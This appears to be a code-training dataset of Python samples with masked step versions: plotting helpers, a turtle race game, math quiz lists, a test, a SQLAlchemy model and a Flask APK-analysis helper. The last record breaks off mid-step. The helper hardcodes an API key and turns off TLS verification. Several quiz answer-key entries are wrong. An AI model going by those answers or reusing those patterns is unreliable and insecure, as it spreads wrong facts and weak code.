patches.Rectangle((start_loc_x+num_grid*2,start_loc_y),num_grid,num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\ndef visualize_mean_var_MC(m, start_loc, num_grid,vmin = -3, vmax = 1,vmin_var = 0, vmax_var = 0.2, cmap = 'viridis', rect = False):\n mu = np.mean(m,axis = 0)\n var = np.var(m,axis = 0)\n plt.figure(figsize = [10,4])\n ax = plt.subplot(1, 2, 1)\n ax.imshow(mu.reshape(num_x,num_y).T, origin = 'lower', cmap = cmap, vmin = vmin, vmax = vmax)\n if rect:\n rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n well_location = [49,49]\n ax.scatter(well_location[0],well_location[1],s = 20, color = 'black', label = 'pumping well')\n direct_data_loc = [30,70]\n ax.scatter(direct_data_loc[0],direct_data_loc[1],s = 50, color = 'red', label = 'direct logK')\n\n ax = plt.subplot(1, 2, 2)\n ax.imshow(var.reshape(num_x,num_y).T, origin = 'lower', cmap = 'magma', vmin = vmin_var, vmax = vmax_var)\n if rect:\n rect = patches.Rectangle((start_loc,start_loc),num_grid, num_grid, linewidth=2,linestyle = 'dashed', edgecolor='black',facecolor='None', label = 'pilot area')\n ax.add_patch(rect)\n ax.set_xticks([])\n ax.set_yticks([])\n\ndef visualize_ensemble_d(d,d_obs,ymin = None,ymax = 11.5):\n plt.plot(np.arange(70)/10, d,color = 'C0')\n plt.plot(np.arange(70)/10, d_obs,color = 'C1',linewidth = 2,label = 'observed data')\n plt.xlabel('Days')\n plt.ylabel('Head')\n plt.legend()\n plt.ylim(ymin,ymax)\n\n# Visualization: updating theta\ndef pos_pairplot(theta_pos, theta_name):\n sns.pairplot(pd.DataFrame(theta_pos.T,columns = theta_name),kind=\"hist\")\n\ndef prior_pos_theta(theta, theta_pos, theta_true, theta_name):\n num_theta = theta.shape[1]\n plt.figure(figsize=[25,10])\n for i in np.arange(num_theta): \n ax = plt.subplot(2, 3, i+1)\n ax.hist(theta[:,i],density=True, bins = 1,label = 'prior',alpha = 0.7)\n y_, _, _ = ax.hist(theta_pos[i,:],density=True, bins = 20,label = 'posterior',alpha = 0.7)\n ax.vlines(x = theta_true[i], ymin = 0, ymax = np.max(y_),linestyles='--',label = 'true',color = 'black')\n ax.legend()\n ax.set_title(theta_name[i])\n ax.set_ylabel('pdf')\n\ndef ML_dimension_reduction_vis(pred_train, y_train, pred_test, y_test, S_d_obs, theta_name):\n fig = plt.figure(figsize=[24,10])\n num_theta = len(theta_name)\n for i in np.arange(num_theta): \n ax = plt.subplot(2, 3, i+1)\n ax.plot(pred_train[:,i], y_train[:,i],'.',label = 'train')\n ax.plot(pred_test[:,i], y_test[:,i],'.',label = 'test')\n ax.vlines(x = S_d_obs[0,i],ymin = -1, ymax = 1, linestyles='--',color = 'black',zorder = 100)\n ax.plot([-1.2,1.2],[-1.2,1.2])\n ax.legend()\n ax.set_xlabel('S(d_'+str(i+1)+')')\n ax.set_ylabel(theta_name[i]+'_rescaled')\n ax.set_xlim(-1.2,1.2)\n ax.set_ylim(-1.2,1.2)\n\ndef history_plot(history):\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc='upper left')\n plt.show()\n",
"step-ids": [
11,
13,
17,
19,
20
]
}
|
[
11,
13,
17,
19,
20
] |
import turtle
from turtle import color
import random
screen = turtle.Screen()
screen.setup(width=500, height=400)
colours = ["red", "pink", "blue", "purple", "black", "green"]
y_pos = [100, 60, 20, -20, -60, -100]
user_bet = screen.textinput(title="Make your bet",
prompt="Which turtle will win? Choose a colour: ")
is_race_on = False
all_racers = []
class Racer(turtle.Turtle):
# def __init__(self, color, x, y):
def __init__(self, color, x, y):
super().__init__(shape="turtle")
self.color(color)
self.penup()
self.goto(x=x, y=y)
def race(self):
self.forward(random.randint(0, 10))
for i in range(0, 6):
racer = Racer(colours[i], -230, y_pos[i])
all_racers.append(racer)
if user_bet:
is_race_on = True
while is_race_on:
for racer in all_racers:
if racer.xcor() > 230:
is_race_on = False
winning_colour = racer.pencolor()
if winning_colour == user_bet:
print(
f"You won! The winning turtle colour was {winning_colour}.")
else:
print(
f"You lost! The winning turtle colour was {winning_colour}.")
racer.race()
screen.exitonclick()
|
normal
|
{
"blob_id": "f3aaa6ae7a9a57946bdb035a4d52e84541c1a292",
"index": 5934,
"step-1": "<mask token>\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\n<mask token>\n",
"step-2": "<mask token>\nscreen.setup(width=500, height=400)\n<mask token>\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-3": "<mask token>\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = ['red', 'pink', 'blue', 'purple', 'black', 'green']\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title='Make your bet', prompt=\n 'Which turtle will win? Choose a colour: ')\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-4": "import turtle\nfrom turtle import color\nimport random\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = ['red', 'pink', 'blue', 'purple', 'black', 'green']\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title='Make your bet', prompt=\n 'Which turtle will win? Choose a colour: ')\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n\n def __init__(self, color, x, y):\n super().__init__(shape='turtle')\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\nif user_bet:\n is_race_on = True\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f'You won! The winning turtle colour was {winning_colour}.'\n )\n else:\n print(\n f'You lost! The winning turtle colour was {winning_colour}.'\n )\n racer.race()\nscreen.exitonclick()\n",
"step-5": "import turtle\nfrom turtle import color\nimport random\n\nscreen = turtle.Screen()\nscreen.setup(width=500, height=400)\ncolours = [\"red\", \"pink\", \"blue\", \"purple\", \"black\", \"green\"]\ny_pos = [100, 60, 20, -20, -60, -100]\nuser_bet = screen.textinput(title=\"Make your bet\",\n prompt=\"Which turtle will win? Choose a colour: \")\nis_race_on = False\nall_racers = []\n\n\nclass Racer(turtle.Turtle):\n # def __init__(self, color, x, y):\n def __init__(self, color, x, y):\n super().__init__(shape=\"turtle\")\n self.color(color)\n self.penup()\n self.goto(x=x, y=y)\n\n def race(self):\n self.forward(random.randint(0, 10))\n\n\nfor i in range(0, 6):\n racer = Racer(colours[i], -230, y_pos[i])\n all_racers.append(racer)\n\nif user_bet:\n is_race_on = True\n\nwhile is_race_on:\n for racer in all_racers:\n if racer.xcor() > 230:\n is_race_on = False\n winning_colour = racer.pencolor()\n if winning_colour == user_bet:\n print(\n f\"You won! The winning turtle colour was {winning_colour}.\")\n else:\n print(\n f\"You lost! The winning turtle colour was {winning_colour}.\")\n racer.race()\n\nscreen.exitonclick()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
Easy = [["4 + 12 = ?", 16],
["45 -34 = ?", 11],
["27 + 12 -18 = ?", 21],
['25 - 5 * 4 = ?', 5],
["18 + 45 / 5 - 3 * 2 = ?", 21],
["5! = ?", 120],
["3! + 2! = ?", 8],
["7 + 5! / 4! - 6 / 3 = ?", 10],
["(25 + 5) / 6 * 4 = ?", 20],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["x + y = 20; x - y = 4; y = ?", 8]]
Normal = [["8(10−k)=2k; k = ?", 8],
["−4n−8=4(−3n+2); n=?", 2],
["4(3+c)+c=c+4; c=?", -2],
["√121 = ?" ,11],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
Hard = [["Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?", 20],
["You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?", 10],
["Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?", 126],
["How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?" ,67],
["You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 12],
["You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?", 2],
["y−3=2(x+1); x= -2, y=?", 48],
["How many unique ways are there to arrange the letters in the word CANNON?", 120],
["How many numbers between 1 and 100(inclusive) are divisible by 10 or 7", 23],
["−x+4y=−9; y=−2x-9; y=?", -3],
["x = √81 - √64; x= ?", 1],
["y = √16 * √4 / √9; y=?", 2],
["y−3=2(x+1); x= -2, y=?", 1],
[" y*y = 4x/5 − 11; y= 5, x = ?", 45],
["y=−4x+6; 3x+4y=-2 ; x=?", 2],
["−x+4y=−9; y=−2x-9; y=?", -3]]
|
normal
|
{
"blob_id": "66edf0d2f7e25e166563bdb1063a1ed45ecda0e6",
"index": 541,
"step-1": "<mask token>\n",
"step-2": "Easy = [['4 + 12 = ?', 16], ['45 -34 = ?', 11], ['27 + 12 -18 = ?', 21], [\n '25 - 5 * 4 = ?', 5], ['18 + 45 / 5 - 3 * 2 = ?', 21], ['5! = ?', 120],\n ['3! + 2! = ?', 8], ['7 + 5! / 4! - 6 / 3 = ?', 10], [\n '(25 + 5) / 6 * 4 = ?', 20], ['4(3+c)+c=c+4; c=?', -2], [\n '\\u200b√\\u200b121 = ?', 11], ['x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'x + y = 20; x - y = 4; y = ?', 8]]\nNormal = [['8(10−k)=2k; k = ?', 8], ['−4n−8=4(−3n+2); n=?', 2], [\n '4(3+c)+c=c+4; c=?', -2], ['\\u200b√\\u200b121 = ?', 11], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], [\n '−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\nHard = [[\n 'Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?'\n , 20], [\n 'You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?'\n , 10], [\n 'Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?'\n , 126], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?',\n 67], [\n \"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 12], [\n \"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\"\n , 2], ['y−3=2(x+1); x= -2, y=?', 48], [\n 'How many unique ways are there to arrange the letters in the word CANNON?'\n , 120], [\n 'How many numbers between 1 and 100(inclusive) are divisible by 10 or 7',\n 23], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3], [\n 'x = √\\u200b81 - √\\u200b64; x= ?', 1], [\n 'y = √\\u200b16 * √\\u200b4 / √\\u200b9; y=?', 2], [\n 'y−3=2(x+1); x= -2, y=?', 1], [' y*y = 4x/5 − 11; y= 5, x = ?', 45], [\n 'y=−4x+6; \\u200b3x+4y=-2 ; x=?', 2], ['−x+4y=−9; \\u200by=−2x-9; y=?', -3]]\n",
"step-3": "Easy = [[\"4 + 12 = ?\", 16],\r\n [\"45 -34 = ?\", 11],\r\n [\"27 + 12 -18 = ?\", 21],\r\n ['25 - 5 * 4 = ?', 5],\r\n [\"18 + 45 / 5 - 3 * 2 = ?\", 21],\r\n [\"5! = ?\", 120],\r\n [\"3! + 2! = ?\", 8],\r\n [\"7 + 5! / 4! - 6 / 3 = ?\", 10],\r\n [\"(25 + 5) / 6 * 4 = ?\", 20],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"x + y = 20; x - y = 4; y = ?\", 8]]\r\n\r\nNormal = [[\"8(10−k)=2k; k = ?\", 8],\r\n [\"−4n−8=4(−3n+2); n=?\", 2],\r\n [\"4(3+c)+c=c+4; c=?\", -2],\r\n [\"√121 = ?\" ,11],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n\r\nHard = [[\"Emily is packing her bags for her vacation. She has 6 unique Fabergé eggs, but only 3 fit in her bag. How many different groups of 3 Fabergé eggs can she take?\", 20],\r\n [\"You just got a free ticket for a boat ride, and you can bring along 2 friends! Unfortunately, you have 5 friends who want to come along. How many different groups of friends could you take with you?\", 10],\r\n [\"Omar is packing his bags for his vacation. He has 999 unique shirts, but only 5 fit in his bag. How many different groups of 5 shirts can he take?\", 126],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 3 or 2?\" ,67],\r\n [\"You need to put your reindeer, Gloopin, Quentin, Ezekiel, and Lancer, in a single-file line to pull your sleigh. However, Quentin and Gloopin are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 12],\r\n [\"You need to put your reindeer, Gloopin, Balthazar, Bloopin, Prancer, and Quentin, in a single-file line to pull your sleigh. However, Prancer and Balthazar are best friends, so you have to put them next to each other, or they won't fly. How many ways can you arrange your reindeer?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 48],\r\n [\"How many unique ways are there to arrange the letters in the word CANNON?\", 120],\r\n [\"How many numbers between 1 and 100(inclusive) are divisible by 10 or 7\", 23],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3],\r\n [\"x = √81 - √64; x= ?\", 1],\r\n [\"y = √16 * √4 / √9; y=?\", 2],\r\n [\"y−3=2(x+1); x= -2, y=?\", 1],\r\n [\" y*y = 4x/5 − 11; y= 5, x = ?\", 45],\r\n [\"y=−4x+6; 3x+4y=-2 ; x=?\", 2],\r\n [\"−x+4y=−9; y=−2x-9; y=?\", -3]]\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pytest
import sys
sys.path.insert(0, '..')
from task_05 import task5
def test_mults():
assert task5.mults(3, 5, 10) == 23
assert task5.mults(5, 3, 10) == 23
assert task5.mults(3, 2, 10) == 32
assert task5.mults(7, 8, 50) == 364
|
normal
|
{
"blob_id": "1c8622167240243da05a241e3630f79cdf36d7a8",
"index": 4776,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-3": "<mask token>\nsys.path.insert(0, '..')\n<mask token>\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-4": "import pytest\nimport sys\nsys.path.insert(0, '..')\nfrom task_05 import task5\n\n\ndef test_mults():\n assert task5.mults(3, 5, 10) == 23\n assert task5.mults(5, 3, 10) == 23\n assert task5.mults(3, 2, 10) == 32\n assert task5.mults(7, 8, 50) == 364\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from __future__ import annotations
from typing import TYPE_CHECKING
from datetime import datetime
from sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer
from sqlalchemy.orm import relationship
from app.db.base_class import Base
if TYPE_CHECKING:
from .account import Account # noqa: F401
from .code import Code # noqa: F401
class Voucher(Base):
__tablename__ = 't_juju_voucher'
code = Column(String(100), index=True, unique=True)
serial_no = Column(String(120), index=True, unique=True)
amount = Column(Float, default=0, nullable=False)
vtime = Column(DateTime(), nullable=False)
vtype = Column(String(50), ForeignKey("t_juju_code.vtype"))
comment = Column(String(150), nullable=True)
create_time = Column(DateTime(), default=datetime.now)
update_time = Column(DateTime(), default=datetime.now,
onupdate=datetime.now)
owner_id = Column(Integer, ForeignKey("t_juju_account.id"))
modifier_id = Column(Integer, ForeignKey("t_juju_account.id"))
|
normal
|
{
"blob_id": "60d8276a5715899823b12ffdf132925c6f2693bd",
"index": 8675,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-3": "<mask token>\nif TYPE_CHECKING:\n from .account import Account\n from .code import Code\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-4": "from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom datetime import datetime\nfrom sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer\nfrom sqlalchemy.orm import relationship\nfrom app.db.base_class import Base\nif TYPE_CHECKING:\n from .account import Account\n from .code import Code\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n vtype = Column(String(50), ForeignKey('t_juju_code.vtype'))\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now, onupdate=\n datetime.now)\n owner_id = Column(Integer, ForeignKey('t_juju_account.id'))\n modifier_id = Column(Integer, ForeignKey('t_juju_account.id'))\n",
"step-5": "from __future__ import annotations\n\n\nfrom typing import TYPE_CHECKING\nfrom datetime import datetime\n\nfrom sqlalchemy import Column, ForeignKey, String, DateTime, Float, Integer\nfrom sqlalchemy.orm import relationship\n\nfrom app.db.base_class import Base\n\nif TYPE_CHECKING:\n from .account import Account # noqa: F401\n from .code import Code # noqa: F401\n\n\nclass Voucher(Base):\n __tablename__ = 't_juju_voucher'\n code = Column(String(100), index=True, unique=True)\n serial_no = Column(String(120), index=True, unique=True)\n amount = Column(Float, default=0, nullable=False)\n vtime = Column(DateTime(), nullable=False)\n\n vtype = Column(String(50), ForeignKey(\"t_juju_code.vtype\"))\n\n comment = Column(String(150), nullable=True)\n create_time = Column(DateTime(), default=datetime.now)\n update_time = Column(DateTime(), default=datetime.now,\n onupdate=datetime.now)\n\n owner_id = Column(Integer, ForeignKey(\"t_juju_account.id\"))\n modifier_id = Column(Integer, ForeignKey(\"t_juju_account.id\"))\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import base64
import json
import os
import re
import subprocess
import time
import traceback
import zipfile
from datetime import datetime
import requests
from flask import request, current_app
from library.oss import oss_upload_monkey_package_picture
from public_config import TCLOUD_FILE_TEMP_PATH
class ToolBusiness(object):
@classmethod
def get_tool_ip(cls):
ip = request.args.get('ip')
url = 'http://api.map.baidu.com/location/ip'
params = {"ip": ip, "ak": 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}
ret = requests.get(url=url, params=params)
ret = json.loads(ret.content)
if ret and 'status' in ret and ret['status'] == 0 and 'content' in ret and 'address' in ret:
return ret['status'], ret['content'], ret['address'], 'ok'
return 101, '', '', '获取失败'
@classmethod
def apk_analysis(cls, apk_download_url, type=1):
try:
# type 1 : not save , 2: save to db
target_path = "/tmp/packages/"
if not os.path.exists(target_path):
os.mkdir(target_path)
date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')
target_name = '{}.apk'.format(date_time_now)
download_apk_name = os.path.join(target_path, target_name)
current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url, download_apk_name))
response = requests.get(url=apk_download_url, verify=False)
with open(download_apk_name, 'wb') as f:
f.write(response.content)
time.sleep(0.5)
# 下载失败
if not os.path.exists(download_apk_name):
current_app.logger.error('{} 下载失败!'.format(apk_download_url))
return 102, "下载失败"
current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))
current_app.logger.info('开始分析')
package_info_re = re.compile(r"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*", re.I)
label_icon_re = re.compile(r"application: label='(.+)'.*icon='(.+)'", re.I)
launchable_activity_re = re.compile(r"launchable-activity: name='(.+)'.*label.*", re.I)
apk_info = {}
cmd = '/usr/local/bin/aapt dump badging {}'.format(download_apk_name)
command_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
infos = command_process.stdout.readlines()
for info in infos:
info = info.decode('utf-8')
if info.startswith('package:'):
temp = package_info_re.search(info)
apk_info['package_name'] = temp.group(1)
apk_info['version_code'] = temp.group(2) or 0
apk_info['version_name'] = temp.group(3)
elif info.startswith('application:'):
temp = label_icon_re.search(info)
apk_info['label'] = temp.group(1)
apk_info['icon'] = temp.group(2)
elif info.startswith('launchable-activity:'):
temp = launchable_activity_re.search(info)
apk_info['default_activity'] = temp.group(1)
try:
size = round(os.path.getsize(download_apk_name) / float(1024 * 1024), 2)
apk_info['size'] = str(size)
zip = zipfile.ZipFile(download_apk_name)
icon_binary = zip.read(apk_info['icon'])
time_now = datetime.now().strftime('%Y%m%d.%H%M%S')
picture = f'monkey-{time_now}.png'
dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'
if not os.path.exists(TCLOUD_FILE_TEMP_PATH):
os.mkdir(TCLOUD_FILE_TEMP_PATH)
if not os.path.exists(dir_path):
os.mkdir(dir_path)
with open(f'{dir_path}/{picture}', 'wb') as f:
f.write(icon_binary)
apk_info['icon'] = oss_upload_monkey_package_picture(dir_path, picture)
except Exception as e:
current_app.logger.warning(e)
current_app.logger.warning(traceback.format_exc())
current_app.logger.info(apk_info)
if type == 1:
pass
elif type == 2:
pass
return apk_info
except Exception as e:
current_app.logger.error(e)
current_app.logger.error(traceback.format_exc())
return {}
|
normal
|
{
"blob_id": "bf45349a9fdfcef7392c477e089c5e3916cb4c8e",
"index": 8502,
"step-1": "<mask token>\n\n\nclass ToolBusiness(object):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass ToolBusiness(object):\n\n @classmethod\n def get_tool_ip(cls):\n ip = request.args.get('ip')\n url = 'http://api.map.baidu.com/location/ip'\n params = {'ip': ip, 'ak': 'kqCYLKt8Uz9VnvHBXA7uOI51FIrei0OM'}\n ret = requests.get(url=url, params=params)\n ret = json.loads(ret.content)\n if ret and 'status' in ret and ret['status'\n ] == 0 and 'content' in ret and 'address' in ret:\n return ret['status'], ret['content'], ret['address'], 'ok'\n return 101, '', '', '获取失败'\n\n @classmethod\n def apk_analysis(cls, apk_download_url, type=1):\n try:\n target_path = '/tmp/packages/'\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n date_time_now = datetime.now().strftime('%Y%m%d-%H.%M.%S')\n target_name = '{}.apk'.format(date_time_now)\n download_apk_name = os.path.join(target_path, target_name)\n current_app.logger.info('开始从 {} 下载到 {}'.format(apk_download_url,\n download_apk_name))\n response = requests.get(url=apk_download_url, verify=False)\n with open(download_apk_name, 'wb') as f:\n f.write(response.content)\n time.sleep(0.5)\n if not os.path.exists(download_apk_name):\n current_app.logger.error('{} 下载失败!'.format(apk_download_url))\n return 102, '下载失败'\n current_app.logger.info('下载成功,保存地址 {}'.format(download_apk_name))\n current_app.logger.info('开始分析')\n package_info_re = re.compile(\n \"package: name='(.*)' versionCode='(.*)' versionName='(.*?)'.*\"\n , re.I)\n label_icon_re = re.compile(\"application: label='(.+)'.*icon='(.+)'\"\n , re.I)\n launchable_activity_re = re.compile(\n \"launchable-activity: name='(.+)'.*label.*\", re.I)\n apk_info = {}\n cmd = '/usr/local/bin/aapt dump badging {}'.format(\n download_apk_name)\n command_process = subprocess.Popen(cmd, shell=True, stdout=\n subprocess.PIPE, stderr=subprocess.STDOUT)\n infos = command_process.stdout.readlines()\n for info in infos:\n info = info.decode('utf-8')\n if info.startswith('package:'):\n temp = package_info_re.search(info)\n apk_info['package_name'] = temp.group(1)\n apk_info['version_code'] = temp.group(2) or 0\n apk_info['version_name'] = temp.group(3)\n elif info.startswith('application:'):\n temp = label_icon_re.search(info)\n apk_info['label'] = temp.group(1)\n apk_info['icon'] = temp.group(2)\n elif info.startswith('launchable-activity:'):\n temp = launchable_activity_re.search(info)\n apk_info['default_activity'] = temp.group(1)\n try:\n size = round(os.path.getsize(download_apk_name) / float(\n 1024 * 1024), 2)\n apk_info['size'] = str(size)\n zip = zipfile.ZipFile(download_apk_name)\n icon_binary = zip.read(apk_info['icon'])\n time_now = datetime.now().strftime('%Y%m%d.%H%M%S')\n picture = f'monkey-{time_now}.png'\n dir_path = f'{TCLOUD_FILE_TEMP_PATH}/monkey'\n if not 